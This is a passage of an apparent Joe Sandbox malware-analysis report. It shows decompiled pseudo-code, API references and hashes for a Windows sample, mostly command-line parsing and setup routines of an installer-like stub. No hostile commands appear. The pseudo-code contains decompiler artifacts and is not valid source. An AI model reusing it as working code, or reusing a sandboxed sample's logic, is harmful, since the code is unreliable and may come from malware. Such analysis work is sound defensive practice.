                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x003e6592
                                                                                                                                                                                                      0x003e6594
                                                                                                                                                                                                      0x003e6596
                                                                                                                                                                                                      0x003e6598
                                                                                                                                                                                                      0x003e6598
                                                                                                                                                                                                      0x003e659b
                                                                                                                                                                                                      0x003e659b
                                                                                                                                                                                                      0x003e659d
                                                                                                                                                                                                      0x003e659e
                                                                                                                                                                                                      0x003e65a2
                                                                                                                                                                                                      0x003e65a4
                                                                                                                                                                                                      0x003e65a9
                                                                                                                                                                                                      0x003e65b2
                                                                                                                                                                                                      0x003e65b6
                                                                                                                                                                                                      0x003e65ba
                                                                                                                                                                                                      0x003e65c3
                                                                                                                                                                                                      0x003e65c5
                                                                                                                                                                                                      0x003e65c8
                                                                                                                                                                                                      0x003e65c8
                                                                                                                                                                                                      0x003e65c3
                                                                                                                                                                                                      0x003e65c9
                                                                                                                                                                                                      0x003e65cc
                                                                                                                                                                                                      0x003e65d2
                                                                                                                                                                                                      0x003e65d1
                                                                                                                                                                                                      0x003e65d1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e65dc
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(003E8B3E,003E8B3F,00000001,003E8B3E,-00000003,?,003E60EC,003E1140,?), ref: 003E65BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: 4fd6d907d199019e02df5719740c3d1ddbaec8349c664c6c745ae54faabeb1ff
                                                                                                                                                                                                      • Instruction ID: c3cb716f2bce9e0cbc2c89dd0915ffb721521d42364ee23f9ad64d8fe32b1c5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fd6d907d199019e02df5719740c3d1ddbaec8349c664c6c745ae54faabeb1ff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F02D323042F09BD333051B9884B67BFDD9BA7390F15075EE8DA872C5CA655C4583A4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E003E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x003e6229
                                                                                                                                                                                                      0x003e6230
                                                                                                                                                                                                      0x003e6247
                                                                                                                                                                                                      0x003e626a
                                                                                                                                                                                                      0x003e6272
                                                                                                                                                                                                      0x003e6249
                                                                                                                                                                                                      0x003e6255
                                                                                                                                                                                                      0x003e625f
                                                                                                                                                                                                      0x003e6264
                                                                                                                                                                                                      0x003e6264
                                                                                                                                                                                                      0x003e6284

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003E623F
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: e2cc64c89a103b6409a5905022ff276f7dc4084a7ac9a96e8e10570a7d6793e8
                                                                                                                                                                                                      • Instruction ID: 193334d4c2f2397c09b0737564ee8052f4d978c8d7da4e9fa06a0c9dd4c2611c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2cc64c89a103b6409a5905022ff276f7dc4084a7ac9a96e8e10570a7d6793e8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCF0B470704258ABD761EB758D43BBE36ACDB54340F40066ABA85DE1C2DD749D448650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0x3e8d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0x3e8d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0x3e8d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x3e8d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x003e4b66
                                                                                                                                                                                                      0x003e4b74
                                                                                                                                                                                                      0x003e4b98
                                                                                                                                                                                                      0x003e4ba0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4bac
                                                                                                                                                                                                      0x003e4ba4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4ba4
                                                                                                                                                                                                      0x003e4b78
                                                                                                                                                                                                      0x003e4b7e
                                                                                                                                                                                                      0x003e4b84
                                                                                                                                                                                                      0x003e4b8a
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,003E4FA1,00000000), ref: 003E4B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 75b994dcbd305fbffc4f86217846420301cdb20ec0a445ca64b768176572ea54
                                                                                                                                                                                                      • Instruction ID: 7b24c564b8126aed72475650f18eb86eb6e35d900a4051cc468051f7bace89ff
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75b994dcbd305fbffc4f86217846420301cdb20ec0a445ca64b768176572ea54
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27F01231D00B9D9E4773DF3ACC10653BBE8BA953603100B2EA4AED21D0DB31A852EB91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E66AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x003e66b1
                                                                                                                                                                                                      0x003e66ba
                                                                                                                                                                                                      0x003e66c7
                                                                                                                                                                                                      0x003e66bc
                                                                                                                                                                                                      0x003e66be
                                                                                                                                                                                                      0x003e66be

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,003E4777,?,003E4E38,?), ref: 003E66B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 85834e32486aee6998deac5e1e69641dd6d342bbb7d9b67a727f0a1e950d2eee
                                                                                                                                                                                                      • Instruction ID: 50cf9d6ed66763d205c2bce9c882333f3e1a27e20928be4402165764feed3e95
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85834e32486aee6998deac5e1e69641dd6d342bbb7d9b67a727f0a1e950d2eee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2B09276232890426A2216326C6A5562845A6D133ABE62B94F032C01E0CA3ED946D004
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x003e4caa
                                                                                                                                                                                                      0x003e4cb1

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 003E4CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      • Opcode ID: 34b8f9d7fdf39783525bd78b2f04e4aa8cd0c06a7b27a13603abc81f37ec30aa
                                                                                                                                                                                                      • Instruction ID: 863fe4b4e3085d8f48376dd4e68296d028fd8597b8e6129c5cc4b1fb152cef0b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34b8f9d7fdf39783525bd78b2f04e4aa8cd0c06a7b27a13603abc81f37ec30aa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80B0123304424CB7CF111FC2EC09FC53F1DE7C4761F150000F60C490908A72A9108696
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}




                                                                                                                                                                                                      0x003e4cc8
                                                                                                                                                                                                      0x003e4ccf

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      • Opcode ID: 70e49948fcf122634faae32073da075278f2280bfdc10bfb30205b5f4996cda8
                                                                                                                                                                                                      • Instruction ID: d56c6e9cec4d7dbb63178589ca63003b7cf06f030d6f2cd8f4b14a29d3f5cc43
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70e49948fcf122634faae32073da075278f2280bfdc10bfb30205b5f4996cda8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1AB0123100014CB78F111B42EC088853F1DD6C0370B000010F50C450218B33AC118585
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E003E5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E003E6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E003E6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E003E597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E003E6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                      												E003E44B9(0, 0x521, 0x3e1140, 0, 0x40, 0);
                                                                                                                                                                                                      												_t85 =  *0x3e8588; // 0x0
                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                      														if(_t183 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t205 = 0x5b;
                                                                                                                                                                                                      															if(E003E667F(_t215, _t205) == 0) {
                                                                                                                                                                                                      																L115:
                                                                                                                                                                                                      																_t206 = 0x5d;
                                                                                                                                                                                                      																if(E003E667F(_t215, _t206) == 0) {
                                                                                                                                                                                                      																	L117:
                                                                                                                                                                                                      																	_t202 =  &_v276;
                                                                                                                                                                                                      																	_v276 = _t167;
                                                                                                                                                                                                      																	if(E003E5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t202 = 0x104;
                                                                                                                                                                                                      																		E003E1680(0x3e8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t202 = 0x5b;
                                                                                                                                                                                                      																	if(E003E667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L117;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t202 = 0x5d;
                                                                                                                                                                                                      																if(E003E667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L115;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *0x3e8a24 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L50;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t100 = _t87 - 1;
                                                                                                                                                                                                      												if(_t100 == 0) {
                                                                                                                                                                                                      													L98:
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
